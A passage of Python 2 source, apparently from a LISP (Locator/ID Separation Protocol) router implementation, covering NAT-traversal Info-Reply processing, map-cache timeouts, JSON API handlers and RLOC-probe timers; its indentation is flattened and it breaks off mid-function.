# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reasssigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Check acitvity timers for encapsulation entries only.
#
if (mc.action == LISP_NO_ACTION):
now = lisp_get_timestamp()
if (mc.last_refresh_time + mc.map_cache_ttl > now):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from lisp_referral_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary array with an array a lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occuring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the youngest entry is not the newest entry. See if it exists as
# an old entry. If not, we prepend the new state, otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to install a emphemeral
# static route to force the Info-Request to go out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
#endif
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this map-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID conifgured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-deivce (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for comes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but differnet translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending RLOC probe if we just a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
